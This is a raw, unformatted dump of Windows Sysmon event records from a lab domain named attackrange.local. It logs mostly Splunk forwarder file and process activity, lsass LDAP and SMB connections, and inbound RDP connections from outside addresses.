09:13:56.053{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050610Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:56.053{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8B54-6151-467A-00000000FC01}5812C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050609Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:56.037{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8B54-6151-467A-00000000FC01}5812C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050608Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:56.038{5EBD8912-8B54-6151-467A-00000000FC01}5812C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050607Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:56.006{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BED656B25F1C4D34187F77361DC3CBA,SHA256=158FAF6C942CB0D42EF2277B03662F19D1BA5F6F263303938C91BD0A5A29813F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979266Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:57.621{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7135D09F4C03D23769199211AF774EC1,SHA256=7827348383123BED4D1A45834DB07183166B8D214689A550E3EE377F66189FB5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050619Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:55.789{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53394-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050618Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:57.109{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA513C5E75C49ECD615BF5CFC46F7FA7,SHA256=DE8FBBC3D24C3A6865D6D77291D41EBDB27FE926831503E74E422656CD46C0C6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979265Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:54.793{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59409-false10.0.1.12-8000- 23542300x8000000000000000979267Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:58.777{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4903EA8DE053474A9A83218D9760AB31,SHA256=5A41139DEE99359F64004ACC3D2BEF2A54E735C761A4114DF0BBD9EAC543626C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050623Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:58.624{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=43D2D5FA3ABD97EE77199A893FB2747A,SHA256=5ABACA24EB3D36F2550B87AE4A0D01C64256E3542E96CA6FB355398319A96F9C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050622Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:56.146{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-64472-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001050621Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:58.393{5EBD8912-7F2D-614D-0B00-00000000FC01}6244740C:\Windows\system32\lsass.exe{5EBD8912-7F11-614D-0100-00000000FC01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+2b3d4|C:\Windows\system32\lsasrv.dll+30929|C:\Windows\system32\lsasrv.dll+2e287|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+15ded|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001050620Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:58.125{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4009007EEC9DA04BE9A2C9FD21570053,SHA256=E39541CBCFF40676D638F376C63B5AC666CC3D96B4BDB1CC7BB03B73C33BBDF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979268Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:59.871{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5BB14EDECE7360C20567E9181866DDB,SHA256=0B6146C355E0D3CCCD12E531F528319034DF0C9A1F161A7E3155255F1E864C2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050630Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:59.772{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8C60F3F64BCCF164186854129511EBD0,SHA256=29F734863449EAACCCEB7EF99659B7C6D433EEB9E9A5A357B0506C5CCF638B0E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050629Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:57.973{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-429.attackrange.local53396-false10.0.1.14win-dc-429.attackrange.local389ldap 354300x80000000000000001050628Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:57.973{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53396-false10.0.1.14win-dc-429.attackrange.local389ldap 354300x80000000000000001050627Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:57.966{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53395-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001050626Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:57.966{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53395-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001050625Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:57.765{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-65514-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050624Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:59.139{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D8E7A6CF5D557A3C44E1D9EFD2F5D5D,SHA256=89A16E0B6B8295E38969A91270477D0AD8A85DE71750408BA4DA59DFAB7C27E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979269Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:00.871{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26BAC13748474F0EAFB137C2F4CC0DDC,SHA256=3690336377DD5EE080B2360A1124BC6B7A785AE4E9F241625DA593EF749E4CEC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050633Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:58.089{5EBD8912-7F11-614D-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53397-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local445microsoft-ds 354300x80000000000000001050632Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:58.089{5EBD8912-7F11-614D-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53397-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local445microsoft-ds 23542300x80000000000000001050631Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:00.153{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AF9C62E2094F7DB20CAF9AB393DCDAD,SHA256=178721A3BE4211A77838A0240495D9765F9294C0243B1B23D1282D005989140B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979270Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:01.886{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15672E870995CDEA140A895F1AEE2586,SHA256=7F89D19702090BA2B3C61569004DF618061847DD1CA0C4EE849335FB37D890AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050634Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:01.173{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=270FA07C59E14BD959B2DB9D4B1CAA46,SHA256=8F99E8510CCB4EE2CE52C7AA6F5CC54597614652336F73256AA86BCC518D3805,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979271Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:02.899{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B938441A7959528532EDE428D4EC2FD,SHA256=D1E11D927004CFB9B3E2AB23D8E70A54534829322D40DCB7E758DCDD72372587,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050635Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:02.204{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAF25559EF8AA2377FEDC74D524BF158,SHA256=87E1CAB4B0046A0FA44DFAE4A110AA9C8FEB996E92C985A304A90B9D1AC53E35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979275Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:03.977{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DFD8E86B76CBE89F59075DB10B872FDC,SHA256=117A6203A72E728724AB84749A6BF73BB761A9AFAAF6ED148C9B6B596529CC41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979274Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:03.977{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0374F78D0D083E83A3B6E13E2F5F816,SHA256=B7E30F3F9B783F48419664651B196FEE39180C09CE0A907BA804F19C0B2CEA42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979273Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:03.977{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5CFAD46BFA8244EA7F45325CBC9292D0,SHA256=44327264E4371455FF1C6AB62E305C62B633D81296CA191A54755B3638383EDF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050637Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:01.762{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53398-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050636Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:03.235{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E51245781C47BF4F6A6E916FE9DAAC12,SHA256=8CC4216944883EFEC332B4D30DC8B90619A42365795A7B8FD2C36185E3A9C818,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979272Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:00.715{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59410-false10.0.1.12-8000- 23542300x80000000000000001050640Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:04.840{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CECC8138573EC2B413E0CBAD65332303,SHA256=7753D5FA18A42FFA59E20BE3055B4A324AC3C4A44D78DF261C28477A93FAB2E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050639Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:04.840{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=390B7F48121E775CBAF0676AAA2FCC3B,SHA256=A320A84C898C367EBDB3A3A7557312971AABCDF5918E4794EE1B54A225D0434A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050638Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:04.274{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C6F8B9776A9D1C33B28282144B63492,SHA256=1555A5162C0D387B22927B34B7C1F8C09D361D89F68BF2AFF714725D3B6FC260,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979277Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:05.180{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A81FD516842EA5510B3B595BDDF5D9D,SHA256=C95816ECED420D39569E4C1A076609A6628E710EBA4BF3CCF2244CA99C0743BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050642Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:03.329{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse93.89.190.250-51651-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050641Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:05.309{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F89AFB47CE049C7836DDBEFFD67F5CF7,SHA256=52F8833399DE094DF4CC9BCE9BA14E39BC6AEAFE085815E9AECD88D87EDCBE56,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979276Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:01.281{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-49394-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979279Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:06.793{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4310MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979278Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:06.337{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0B96F7B489F75E78037EC1F642990C0,SHA256=63A69A0402A39FC5DDFB8FDAF5035B2682AC3253085ADDDCD5DCF6021CD18F0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050645Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:06.650{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CECC8138573EC2B413E0CBAD65332303,SHA256=7753D5FA18A42FFA59E20BE3055B4A324AC3C4A44D78DF261C28477A93FAB2E8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050644Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:03.872{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de57188-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050643Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:06.310{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36C08E37FFB7BCE95B7601D6091A86C3,SHA256=9023EC18501B946A96022F82857E25CC7BF65D4B7D150AAA4171095722580A35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979281Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:07.806{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4311MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979280Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:07.571{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A2C41F768338FB60843FCC442481B56,SHA256=0EE3C5A5FA180548175C8240B95EC3489A75E5D4D84D570B865299063F38E741,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050647Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:05.911{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-53150-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050646Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:07.322{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 